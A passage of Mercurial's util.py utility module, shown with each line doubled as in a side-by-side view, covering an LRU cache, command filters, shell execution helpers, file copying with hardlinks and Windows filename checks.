1164 Visually, let's make ``N`` the new head node (* denotes head):
1164 Visually, let's make ``N`` the new head node (* denotes head):
1165
1165
1166 previous/oldest <-> head <-> next/next newest
1166 previous/oldest <-> head <-> next/next newest
1167
1167
1168 ----<->--- A* ---<->-----
1168 ----<->--- A* ---<->-----
1169 | |
1169 | |
1170 E <-> D <-> N <-> C <-> B
1170 E <-> D <-> N <-> C <-> B
1171
1171
1172 To:
1172 To:
1173
1173
1174 ----<->--- N* ---<->-----
1174 ----<->--- N* ---<->-----
1175 | |
1175 | |
1176 E <-> D <-> C <-> B <-> A
1176 E <-> D <-> C <-> B <-> A
1177
1177
1178 This requires the following moves:
1178 This requires the following moves:
1179
1179
1180 C.next = D (node.prev.next = node.next)
1180 C.next = D (node.prev.next = node.next)
1181 D.prev = C (node.next.prev = node.prev)
1181 D.prev = C (node.next.prev = node.prev)
1182 E.next = N (head.prev.next = node)
1182 E.next = N (head.prev.next = node)
1183 N.prev = E (node.prev = head.prev)
1183 N.prev = E (node.prev = head.prev)
1184 N.next = A (node.next = head)
1184 N.next = A (node.next = head)
1185 A.prev = N (head.prev = node)
1185 A.prev = N (head.prev = node)
1186 """
1186 """
1187 head = self._head
1187 head = self._head
1188 # C.next = D
1188 # C.next = D
1189 node.prev.next = node.next
1189 node.prev.next = node.next
1190 # D.prev = C
1190 # D.prev = C
1191 node.next.prev = node.prev
1191 node.next.prev = node.prev
1192 # N.prev = E
1192 # N.prev = E
1193 node.prev = head.prev
1193 node.prev = head.prev
1194 # N.next = A
1194 # N.next = A
1195 # It is tempting to do just "head" here, however if node is
1195 # It is tempting to do just "head" here, however if node is
1196 # adjacent to head, this will do bad things.
1196 # adjacent to head, this will do bad things.
1197 node.next = head.prev.next
1197 node.next = head.prev.next
1198 # E.next = N
1198 # E.next = N
1199 node.next.prev = node
1199 node.next.prev = node
1200 # A.prev = N
1200 # A.prev = N
1201 node.prev.next = node
1201 node.prev.next = node
1202
1202
1203 self._head = node
1203 self._head = node
1204
1204
1205 def _addcapacity(self):
1205 def _addcapacity(self):
1206 """Add a node to the circular linked list.
1206 """Add a node to the circular linked list.
1207
1207
1208 The new node is inserted before the head node.
1208 The new node is inserted before the head node.
1209 """
1209 """
1210 head = self._head
1210 head = self._head
1211 node = _lrucachenode()
1211 node = _lrucachenode()
1212 head.prev.next = node
1212 head.prev.next = node
1213 node.prev = head.prev
1213 node.prev = head.prev
1214 node.next = head
1214 node.next = head
1215 head.prev = node
1215 head.prev = node
1216 self._size += 1
1216 self._size += 1
1217 return node
1217 return node
1218
1218
1219 def lrucachefunc(func):
1219 def lrucachefunc(func):
1220 '''cache most recent results of function calls'''
1220 '''cache most recent results of function calls'''
1221 cache = {}
1221 cache = {}
1222 order = collections.deque()
1222 order = collections.deque()
1223 if func.__code__.co_argcount == 1:
1223 if func.__code__.co_argcount == 1:
1224 def f(arg):
1224 def f(arg):
1225 if arg not in cache:
1225 if arg not in cache:
1226 if len(cache) > 20:
1226 if len(cache) > 20:
1227 del cache[order.popleft()]
1227 del cache[order.popleft()]
1228 cache[arg] = func(arg)
1228 cache[arg] = func(arg)
1229 else:
1229 else:
1230 order.remove(arg)
1230 order.remove(arg)
1231 order.append(arg)
1231 order.append(arg)
1232 return cache[arg]
1232 return cache[arg]
1233 else:
1233 else:
1234 def f(*args):
1234 def f(*args):
1235 if args not in cache:
1235 if args not in cache:
1236 if len(cache) > 20:
1236 if len(cache) > 20:
1237 del cache[order.popleft()]
1237 del cache[order.popleft()]
1238 cache[args] = func(*args)
1238 cache[args] = func(*args)
1239 else:
1239 else:
1240 order.remove(args)
1240 order.remove(args)
1241 order.append(args)
1241 order.append(args)
1242 return cache[args]
1242 return cache[args]
1243
1243
1244 return f
1244 return f
1245
1245
1246 class propertycache(object):
1246 class propertycache(object):
1247 def __init__(self, func):
1247 def __init__(self, func):
1248 self.func = func
1248 self.func = func
1249 self.name = func.__name__
1249 self.name = func.__name__
1250 def __get__(self, obj, type=None):
1250 def __get__(self, obj, type=None):
1251 result = self.func(obj)
1251 result = self.func(obj)
1252 self.cachevalue(obj, result)
1252 self.cachevalue(obj, result)
1253 return result
1253 return result
1254
1254
1255 def cachevalue(self, obj, value):
1255 def cachevalue(self, obj, value):
1256 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1256 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1257 obj.__dict__[self.name] = value
1257 obj.__dict__[self.name] = value
1258
1258
1259 def clearcachedproperty(obj, prop):
1259 def clearcachedproperty(obj, prop):
1260 '''clear a cached property value, if one has been set'''
1260 '''clear a cached property value, if one has been set'''
1261 if prop in obj.__dict__:
1261 if prop in obj.__dict__:
1262 del obj.__dict__[prop]
1262 del obj.__dict__[prop]
1263
1263
1264 def pipefilter(s, cmd):
1264 def pipefilter(s, cmd):
1265 '''filter string S through command CMD, returning its output'''
1265 '''filter string S through command CMD, returning its output'''
1266 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1266 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1267 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1267 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1268 pout, perr = p.communicate(s)
1268 pout, perr = p.communicate(s)
1269 return pout
1269 return pout
1270
1270
1271 def tempfilter(s, cmd):
1271 def tempfilter(s, cmd):
1272 '''filter string S through a pair of temporary files with CMD.
1272 '''filter string S through a pair of temporary files with CMD.
1273 CMD is used as a template to create the real command to be run,
1273 CMD is used as a template to create the real command to be run,
1274 with the strings INFILE and OUTFILE replaced by the real names of
1274 with the strings INFILE and OUTFILE replaced by the real names of
1275 the temporary files generated.'''
1275 the temporary files generated.'''
1276 inname, outname = None, None
1276 inname, outname = None, None
1277 try:
1277 try:
1278 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1278 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1279 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1279 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1280 fp.write(s)
1280 fp.write(s)
1281 fp.close()
1281 fp.close()
1282 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1282 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1283 os.close(outfd)
1283 os.close(outfd)
1284 cmd = cmd.replace('INFILE', inname)
1284 cmd = cmd.replace('INFILE', inname)
1285 cmd = cmd.replace('OUTFILE', outname)
1285 cmd = cmd.replace('OUTFILE', outname)
1286 code = os.system(cmd)
1286 code = os.system(cmd)
1287 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1287 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1288 code = 0
1288 code = 0
1289 if code:
1289 if code:
1290 raise Abort(_("command '%s' failed: %s") %
1290 raise Abort(_("command '%s' failed: %s") %
1291 (cmd, explainexit(code)))
1291 (cmd, explainexit(code)))
1292 return readfile(outname)
1292 return readfile(outname)
1293 finally:
1293 finally:
1294 try:
1294 try:
1295 if inname:
1295 if inname:
1296 os.unlink(inname)
1296 os.unlink(inname)
1297 except OSError:
1297 except OSError:
1298 pass
1298 pass
1299 try:
1299 try:
1300 if outname:
1300 if outname:
1301 os.unlink(outname)
1301 os.unlink(outname)
1302 except OSError:
1302 except OSError:
1303 pass
1303 pass
1304
1304
1305 filtertable = {
1305 filtertable = {
1306 'tempfile:': tempfilter,
1306 'tempfile:': tempfilter,
1307 'pipe:': pipefilter,
1307 'pipe:': pipefilter,
1308 }
1308 }
1309
1309
1310 def filter(s, cmd):
1310 def filter(s, cmd):
1311 "filter a string through a command that transforms its input to its output"
1311 "filter a string through a command that transforms its input to its output"
1312 for name, fn in filtertable.iteritems():
1312 for name, fn in filtertable.iteritems():
1313 if cmd.startswith(name):
1313 if cmd.startswith(name):
1314 return fn(s, cmd[len(name):].lstrip())
1314 return fn(s, cmd[len(name):].lstrip())
1315 return pipefilter(s, cmd)
1315 return pipefilter(s, cmd)
1316
1316
1317 def binary(s):
1317 def binary(s):
1318 """return true if a string is binary data"""
1318 """return true if a string is binary data"""
1319 return bool(s and '\0' in s)
1319 return bool(s and '\0' in s)
1320
1320
1321 def increasingchunks(source, min=1024, max=65536):
1321 def increasingchunks(source, min=1024, max=65536):
1322 '''return no less than min bytes per chunk while data remains,
1322 '''return no less than min bytes per chunk while data remains,
1323 doubling min after each chunk until it reaches max'''
1323 doubling min after each chunk until it reaches max'''
1324 def log2(x):
1324 def log2(x):
1325 if not x:
1325 if not x:
1326 return 0
1326 return 0
1327 i = 0
1327 i = 0
1328 while x:
1328 while x:
1329 x >>= 1
1329 x >>= 1
1330 i += 1
1330 i += 1
1331 return i - 1
1331 return i - 1
1332
1332
1333 buf = []
1333 buf = []
1334 blen = 0
1334 blen = 0
1335 for chunk in source:
1335 for chunk in source:
1336 buf.append(chunk)
1336 buf.append(chunk)
1337 blen += len(chunk)
1337 blen += len(chunk)
1338 if blen >= min:
1338 if blen >= min:
1339 if min < max:
1339 if min < max:
1340 min = min << 1
1340 min = min << 1
1341 nmin = 1 << log2(blen)
1341 nmin = 1 << log2(blen)
1342 if nmin > min:
1342 if nmin > min:
1343 min = nmin
1343 min = nmin
1344 if min > max:
1344 if min > max:
1345 min = max
1345 min = max
1346 yield ''.join(buf)
1346 yield ''.join(buf)
1347 blen = 0
1347 blen = 0
1348 buf = []
1348 buf = []
1349 if buf:
1349 if buf:
1350 yield ''.join(buf)
1350 yield ''.join(buf)
1351
1351
1352 Abort = error.Abort
1352 Abort = error.Abort
1353
1353
1354 def always(fn):
1354 def always(fn):
1355 return True
1355 return True
1356
1356
1357 def never(fn):
1357 def never(fn):
1358 return False
1358 return False
1359
1359
1360 def nogc(func):
1360 def nogc(func):
1361 """disable garbage collector
1361 """disable garbage collector
1362
1362
1363 Python's garbage collector triggers a GC each time a certain number of
1363 Python's garbage collector triggers a GC each time a certain number of
1364 container objects (the number being defined by gc.get_threshold()) are
1364 container objects (the number being defined by gc.get_threshold()) are
1365 allocated even when marked not to be tracked by the collector. Tracking has
1365 allocated even when marked not to be tracked by the collector. Tracking has
1366 no effect on when GCs are triggered, only on what objects the GC looks
1366 no effect on when GCs are triggered, only on what objects the GC looks
1367 into. As a workaround, disable GC while building complex (huge)
1367 into. As a workaround, disable GC while building complex (huge)
1368 containers.
1368 containers.
1369
1369
1370 This garbage collector issue have been fixed in 2.7. But it still affect
1370 This garbage collector issue have been fixed in 2.7. But it still affect
1371 CPython's performance.
1371 CPython's performance.
1372 """
1372 """
1373 def wrapper(*args, **kwargs):
1373 def wrapper(*args, **kwargs):
1374 gcenabled = gc.isenabled()
1374 gcenabled = gc.isenabled()
1375 gc.disable()
1375 gc.disable()
1376 try:
1376 try:
1377 return func(*args, **kwargs)
1377 return func(*args, **kwargs)
1378 finally:
1378 finally:
1379 if gcenabled:
1379 if gcenabled:
1380 gc.enable()
1380 gc.enable()
1381 return wrapper
1381 return wrapper
1382
1382
1383 if pycompat.ispypy:
1383 if pycompat.ispypy:
1384 # PyPy runs slower with gc disabled
1384 # PyPy runs slower with gc disabled
1385 nogc = lambda x: x
1385 nogc = lambda x: x
1386
1386
1387 def pathto(root, n1, n2):
1387 def pathto(root, n1, n2):
1388 '''return the relative path from one place to another.
1388 '''return the relative path from one place to another.
1389 root should use os.sep to separate directories
1389 root should use os.sep to separate directories
1390 n1 should use os.sep to separate directories
1390 n1 should use os.sep to separate directories
1391 n2 should use "/" to separate directories
1391 n2 should use "/" to separate directories
1392 returns an os.sep-separated path.
1392 returns an os.sep-separated path.
1393
1393
1394 If n1 is a relative path, it's assumed it's
1394 If n1 is a relative path, it's assumed it's
1395 relative to root.
1395 relative to root.
1396 n2 should always be relative to root.
1396 n2 should always be relative to root.
1397 '''
1397 '''
1398 if not n1:
1398 if not n1:
1399 return localpath(n2)
1399 return localpath(n2)
1400 if os.path.isabs(n1):
1400 if os.path.isabs(n1):
1401 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1401 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1402 return os.path.join(root, localpath(n2))
1402 return os.path.join(root, localpath(n2))
1403 n2 = '/'.join((pconvert(root), n2))
1403 n2 = '/'.join((pconvert(root), n2))
1404 a, b = splitpath(n1), n2.split('/')
1404 a, b = splitpath(n1), n2.split('/')
1405 a.reverse()
1405 a.reverse()
1406 b.reverse()
1406 b.reverse()
1407 while a and b and a[-1] == b[-1]:
1407 while a and b and a[-1] == b[-1]:
1408 a.pop()
1408 a.pop()
1409 b.pop()
1409 b.pop()
1410 b.reverse()
1410 b.reverse()
1411 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1411 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1412
1412
1413 def mainfrozen():
1413 def mainfrozen():
1414 """return True if we are a frozen executable.
1414 """return True if we are a frozen executable.
1415
1415
1416 The code supports py2exe (most common, Windows only) and tools/freeze
1416 The code supports py2exe (most common, Windows only) and tools/freeze
1417 (portable, not much used).
1417 (portable, not much used).
1418 """
1418 """
1419 return (safehasattr(sys, "frozen") or # new py2exe
1419 return (safehasattr(sys, "frozen") or # new py2exe
1420 safehasattr(sys, "importers") or # old py2exe
1420 safehasattr(sys, "importers") or # old py2exe
1421 imp.is_frozen(u"__main__")) # tools/freeze
1421 imp.is_frozen(u"__main__")) # tools/freeze
1422
1422
1423 # the location of data files matching the source code
1423 # the location of data files matching the source code
1424 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1424 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1425 # executable version (py2exe) doesn't support __file__
1425 # executable version (py2exe) doesn't support __file__
1426 datapath = os.path.dirname(pycompat.sysexecutable)
1426 datapath = os.path.dirname(pycompat.sysexecutable)
1427 else:
1427 else:
1428 datapath = os.path.dirname(pycompat.fsencode(__file__))
1428 datapath = os.path.dirname(pycompat.fsencode(__file__))
1429
1429
1430 i18n.setdatapath(datapath)
1430 i18n.setdatapath(datapath)
1431
1431
1432 _hgexecutable = None
1432 _hgexecutable = None
1433
1433
1434 def hgexecutable():
1434 def hgexecutable():
1435 """return location of the 'hg' executable.
1435 """return location of the 'hg' executable.
1436
1436
1437 Defaults to $HG or 'hg' in the search path.
1437 Defaults to $HG or 'hg' in the search path.
1438 """
1438 """
1439 if _hgexecutable is None:
1439 if _hgexecutable is None:
1440 hg = encoding.environ.get('HG')
1440 hg = encoding.environ.get('HG')
1441 mainmod = sys.modules[pycompat.sysstr('__main__')]
1441 mainmod = sys.modules[pycompat.sysstr('__main__')]
1442 if hg:
1442 if hg:
1443 _sethgexecutable(hg)
1443 _sethgexecutable(hg)
1444 elif mainfrozen():
1444 elif mainfrozen():
1445 if getattr(sys, 'frozen', None) == 'macosx_app':
1445 if getattr(sys, 'frozen', None) == 'macosx_app':
1446 # Env variable set by py2app
1446 # Env variable set by py2app
1447 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1447 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1448 else:
1448 else:
1449 _sethgexecutable(pycompat.sysexecutable)
1449 _sethgexecutable(pycompat.sysexecutable)
1450 elif (os.path.basename(
1450 elif (os.path.basename(
1451 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1451 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1452 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1452 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1453 else:
1453 else:
1454 exe = findexe('hg') or os.path.basename(sys.argv[0])
1454 exe = findexe('hg') or os.path.basename(sys.argv[0])
1455 _sethgexecutable(exe)
1455 _sethgexecutable(exe)
1456 return _hgexecutable
1456 return _hgexecutable
1457
1457
1458 def _sethgexecutable(path):
1458 def _sethgexecutable(path):
1459 """set location of the 'hg' executable"""
1459 """set location of the 'hg' executable"""
1460 global _hgexecutable
1460 global _hgexecutable
1461 _hgexecutable = path
1461 _hgexecutable = path
1462
1462
1463 def _isstdout(f):
1463 def _isstdout(f):
1464 fileno = getattr(f, 'fileno', None)
1464 fileno = getattr(f, 'fileno', None)
1465 try:
1465 try:
1466 return fileno and fileno() == sys.__stdout__.fileno()
1466 return fileno and fileno() == sys.__stdout__.fileno()
1467 except io.UnsupportedOperation:
1467 except io.UnsupportedOperation:
1468 return False # fileno() raised UnsupportedOperation
1468 return False # fileno() raised UnsupportedOperation
1469
1469
1470 def shellenviron(environ=None):
1470 def shellenviron(environ=None):
1471 """return environ with optional override, useful for shelling out"""
1471 """return environ with optional override, useful for shelling out"""
1472 def py2shell(val):
1472 def py2shell(val):
1473 'convert python object into string that is useful to shell'
1473 'convert python object into string that is useful to shell'
1474 if val is None or val is False:
1474 if val is None or val is False:
1475 return '0'
1475 return '0'
1476 if val is True:
1476 if val is True:
1477 return '1'
1477 return '1'
1478 return pycompat.bytestr(val)
1478 return pycompat.bytestr(val)
1479 env = dict(encoding.environ)
1479 env = dict(encoding.environ)
1480 if environ:
1480 if environ:
1481 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1481 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1482 env['HG'] = hgexecutable()
1482 env['HG'] = hgexecutable()
1483 return env
1483 return env
1484
1484
1485 def system(cmd, environ=None, cwd=None, out=None):
1485 def system(cmd, environ=None, cwd=None, out=None):
1486 '''enhanced shell command execution.
1486 '''enhanced shell command execution.
1487 run with environment maybe modified, maybe in different dir.
1487 run with environment maybe modified, maybe in different dir.
1488
1488
1489 if out is specified, it is assumed to be a file-like object that has a
1489 if out is specified, it is assumed to be a file-like object that has a
1490 write() method. stdout and stderr will be redirected to out.'''
1490 write() method. stdout and stderr will be redirected to out.'''
1491 try:
1491 try:
1492 stdout.flush()
1492 stdout.flush()
1493 except Exception:
1493 except Exception:
1494 pass
1494 pass
1495 cmd = quotecommand(cmd)
1495 cmd = quotecommand(cmd)
1496 env = shellenviron(environ)
1496 env = shellenviron(environ)
1497 if out is None or _isstdout(out):
1497 if out is None or _isstdout(out):
1498 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1498 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1499 env=env, cwd=cwd)
1499 env=env, cwd=cwd)
1500 else:
1500 else:
1501 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1501 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1502 env=env, cwd=cwd, stdout=subprocess.PIPE,
1502 env=env, cwd=cwd, stdout=subprocess.PIPE,
1503 stderr=subprocess.STDOUT)
1503 stderr=subprocess.STDOUT)
1504 for line in iter(proc.stdout.readline, ''):
1504 for line in iter(proc.stdout.readline, ''):
1505 out.write(line)
1505 out.write(line)
1506 proc.wait()
1506 proc.wait()
1507 rc = proc.returncode
1507 rc = proc.returncode
1508 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1508 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1509 rc = 0
1509 rc = 0
1510 return rc
1510 return rc
1511
1511
1512 def checksignature(func):
1512 def checksignature(func):
1513 '''wrap a function with code to check for calling errors'''
1513 '''wrap a function with code to check for calling errors'''
1514 def check(*args, **kwargs):
1514 def check(*args, **kwargs):
1515 try:
1515 try:
1516 return func(*args, **kwargs)
1516 return func(*args, **kwargs)
1517 except TypeError:
1517 except TypeError:
1518 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1518 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1519 raise error.SignatureError
1519 raise error.SignatureError
1520 raise
1520 raise
1521
1521
1522 return check
1522 return check
1523
1523
1524 # a whilelist of known filesystems where hardlink works reliably
1524 # a whilelist of known filesystems where hardlink works reliably
1525 _hardlinkfswhitelist = {
1525 _hardlinkfswhitelist = {
1526 'btrfs',
1526 'btrfs',
1527 'ext2',
1527 'ext2',
1528 'ext3',
1528 'ext3',
1529 'ext4',
1529 'ext4',
1530 'hfs',
1530 'hfs',
1531 'jfs',
1531 'jfs',
1532 'NTFS',
1532 'NTFS',
1533 'reiserfs',
1533 'reiserfs',
1534 'tmpfs',
1534 'tmpfs',
1535 'ufs',
1535 'ufs',
1536 'xfs',
1536 'xfs',
1537 'zfs',
1537 'zfs',
1538 }
1538 }
1539
1539
1540 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1540 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1541 '''copy a file, preserving mode and optionally other stat info like
1541 '''copy a file, preserving mode and optionally other stat info like
1542 atime/mtime
1542 atime/mtime
1543
1543
1544 checkambig argument is used with filestat, and is useful only if
1544 checkambig argument is used with filestat, and is useful only if
1545 destination file is guarded by any lock (e.g. repo.lock or
1545 destination file is guarded by any lock (e.g. repo.lock or
1546 repo.wlock).
1546 repo.wlock).
1547
1547
1548 copystat and checkambig should be exclusive.
1548 copystat and checkambig should be exclusive.
1549 '''
1549 '''
1550 assert not (copystat and checkambig)
1550 assert not (copystat and checkambig)
1551 oldstat = None
1551 oldstat = None
1552 if os.path.lexists(dest):
1552 if os.path.lexists(dest):
1553 if checkambig:
1553 if checkambig:
1554 oldstat = checkambig and filestat.frompath(dest)
1554 oldstat = checkambig and filestat.frompath(dest)
1555 unlink(dest)
1555 unlink(dest)
1556 if hardlink:
1556 if hardlink:
1557 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1557 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1558 # unless we are confident that dest is on a whitelisted filesystem.
1558 # unless we are confident that dest is on a whitelisted filesystem.
1559 try:
1559 try:
1560 fstype = getfstype(os.path.dirname(dest))
1560 fstype = getfstype(os.path.dirname(dest))
1561 except OSError:
1561 except OSError:
1562 fstype = None
1562 fstype = None
1563 if fstype not in _hardlinkfswhitelist:
1563 if fstype not in _hardlinkfswhitelist:
1564 hardlink = False
1564 hardlink = False
1565 if hardlink:
1565 if hardlink:
1566 try:
1566 try:
1567 oslink(src, dest)
1567 oslink(src, dest)
1568 return
1568 return
1569 except (IOError, OSError):
1569 except (IOError, OSError):
1570 pass # fall back to normal copy
1570 pass # fall back to normal copy
1571 if os.path.islink(src):
1571 if os.path.islink(src):
1572 os.symlink(os.readlink(src), dest)
1572 os.symlink(os.readlink(src), dest)
1573 # copytime is ignored for symlinks, but in general copytime isn't needed
1573 # copytime is ignored for symlinks, but in general copytime isn't needed
1574 # for them anyway
1574 # for them anyway
1575 else:
1575 else:
1576 try:
1576 try:
1577 shutil.copyfile(src, dest)
1577 shutil.copyfile(src, dest)
1578 if copystat:
1578 if copystat:
1579 # copystat also copies mode
1579 # copystat also copies mode
1580 shutil.copystat(src, dest)
1580 shutil.copystat(src, dest)
1581 else:
1581 else:
1582 shutil.copymode(src, dest)
1582 shutil.copymode(src, dest)
1583 if oldstat and oldstat.stat:
1583 if oldstat and oldstat.stat:
1584 newstat = filestat.frompath(dest)
1584 newstat = filestat.frompath(dest)
1585 if newstat.isambig(oldstat):
1585 if newstat.isambig(oldstat):
1586 # stat of copied file is ambiguous to original one
1586 # stat of copied file is ambiguous to original one
1587 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1587 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1588 os.utime(dest, (advanced, advanced))
1588 os.utime(dest, (advanced, advanced))
1589 except shutil.Error as inst:
1589 except shutil.Error as inst:
1590 raise Abort(str(inst))
1590 raise Abort(str(inst))
1591
1591
1592 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1592 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1593 """Copy a directory tree using hardlinks if possible."""
1593 """Copy a directory tree using hardlinks if possible."""
1594 num = 0
1594 num = 0
1595
1595
1596 gettopic = lambda: hardlink and _('linking') or _('copying')
1596 gettopic = lambda: hardlink and _('linking') or _('copying')
1597
1597
1598 if os.path.isdir(src):
1598 if os.path.isdir(src):
1599 if hardlink is None:
1599 if hardlink is None:
1600 hardlink = (os.stat(src).st_dev ==
1600 hardlink = (os.stat(src).st_dev ==
1601 os.stat(os.path.dirname(dst)).st_dev)
1601 os.stat(os.path.dirname(dst)).st_dev)
1602 topic = gettopic()
1602 topic = gettopic()
1603 os.mkdir(dst)
1603 os.mkdir(dst)
1604 for name, kind in listdir(src):
1604 for name, kind in listdir(src):
1605 srcname = os.path.join(src, name)
1605 srcname = os.path.join(src, name)
1606 dstname = os.path.join(dst, name)
1606 dstname = os.path.join(dst, name)
1607 def nprog(t, pos):
1607 def nprog(t, pos):
1608 if pos is not None:
1608 if pos is not None:
1609 return progress(t, pos + num)
1609 return progress(t, pos + num)
1610 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1610 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1611 num += n
1611 num += n
1612 else:
1612 else:
1613 if hardlink is None:
1613 if hardlink is None:
1614 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1614 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1615 os.stat(os.path.dirname(dst)).st_dev)
1615 os.stat(os.path.dirname(dst)).st_dev)
1616 topic = gettopic()
1616 topic = gettopic()
1617
1617
1618 if hardlink:
1618 if hardlink:
1619 try:
1619 try:
1620 oslink(src, dst)
1620 oslink(src, dst)
1621 except (IOError, OSError):
1621 except (IOError, OSError):
1622 hardlink = False
1622 hardlink = False
1623 shutil.copy(src, dst)
1623 shutil.copy(src, dst)
1624 else:
1624 else:
1625 shutil.copy(src, dst)
1625 shutil.copy(src, dst)
1626 num += 1
1626 num += 1
1627 progress(topic, num)
1627 progress(topic, num)
1628 progress(topic, None)
1628 progress(topic, None)
1629
1629
1630 return hardlink, num
1630 return hardlink, num
1631
1631
1632 _winreservednames = {
1632 _winreservednames = {
1633 'con', 'prn', 'aux', 'nul',
1633 'con', 'prn', 'aux', 'nul',
1634 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1634 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1635 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1635 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1636 }
1636 }
1637 _winreservedchars = ':*?"<>|'
1637 _winreservedchars = ':*?"<>|'
1638 def checkwinfilename(path):
1638 def checkwinfilename(path):
1639 r'''Check that the base-relative path is a valid filename on Windows.
1639 r'''Check that the base-relative path is a valid filename on Windows.
1640 Returns None if the path is ok, or a UI string describing the problem.
1640 Returns None if the path is ok, or a UI string describing the problem.
1641
1641
1642 >>> checkwinfilename(b"just/a/normal/path")
1642 >>> checkwinfilename(b"just/a/normal/path")
1643 >>> checkwinfilename(b"foo/bar/con.xml")
1643 >>> checkwinfilename(b"foo/bar/con.xml")
1644 "filename contains 'con', which is reserved on Windows"
1644 "filename contains 'con', which is reserved on Windows"
1645 >>> checkwinfilename(b"foo/con.xml/bar")
1645 >>> checkwinfilename(b"foo/con.xml/bar")
1646 "filename contains 'con', which is reserved on Windows"
1646 "filename contains 'con', which is reserved on Windows"
1647 >>> checkwinfilename(b"foo/bar/xml.con")
1647 >>> checkwinfilename(b"foo/bar/xml.con")
1648 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1648 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1649 "filename contains 'AUX', which is reserved on Windows"
1649 "filename contains 'AUX', which is reserved on Windows"
1650 >>> checkwinfilename(b"foo/bar/bla:.txt")
1650 >>> checkwinfilename(b"foo/bar/bla:.txt")
1651 "filename contains ':', which is reserved on Windows"
1651 "filename contains ':', which is reserved on Windows"
1652 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1652 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1653 "filename contains '\\x07', which is invalid on Windows"
1653 "filename contains '\\x07', which is invalid on Windows"
1654 >>> checkwinfilename(b"foo/bar/bla ")
1654 >>> checkwinfilename(b"foo/bar/bla ")
1655 "filename ends with ' ', which is not allowed on Windows"
1655 "filename ends with ' ', which is not allowed on Windows"
1656 >>> checkwinfilename(b"../bar")
1656 >>> checkwinfilename(b"../bar")
1657 >>> checkwinfilename(b"foo\\")
1657 >>> checkwinfilename(b"foo\\")
1658 "filename ends with '\\', which is invalid on Windows"
1658 "filename ends with '\\', which is invalid on Windows"
1659 >>> checkwinfilename(b"foo\\/bar")
1659 >>> checkwinfilename(b"foo\\/bar")
1660 "directory name ends with '\\', which is invalid on Windows"
1660 "directory name ends with '\\', which is invalid on Windows"
1661 '''
1661 '''
1662 if path.endswith('\\'):
1662 if path.endswith('\\'):
1663 return _("filename ends with '\\', which is invalid on Windows")
1663 return _("filename ends with '\\', which is invalid on Windows")
1664 if '\\/' in path:
1664 if '\\/' in path:
1665 return _("directory name ends with '\\', which is invalid on Windows")
1665 return _("directory name ends with '\\', which is invalid on Windows")
1666 for n in path.replace('\\', '/').split('/'):
1666 for n in path.replace('\\', '/').split('/'):
1667 if not n:
1667 if not n:
1668 continue
1668 continue
1669 for c in _filenamebytestr(n):
1669 for c in _filenamebytestr(n):
1670 if c in _winreservedchars:
1670 if c in _winreservedchars:
1671 return _("filename contains '%s', which is reserved "
1671 return _("filename contains '%s', which is reserved "
1672 "on Windows") % c
1672 "on Windows") % c
1673 if ord(c) <= 31:
1673 if ord(c) <= 31:
1674 return _("filename contains '%s', which is invalid "
1674 return _("filename contains '%s', which is invalid "
1675 "on Windows") % escapestr(c)
1675 "on Windows") % escapestr(c)
1676 base = n.split('.')[0]
1676 base = n.split('.')[0]
1677 if base and base.lower() in _winreservednames:
1677 if base and base.lower() in _winreservednames:
1678 return _("filename contains '%s', which is reserved "
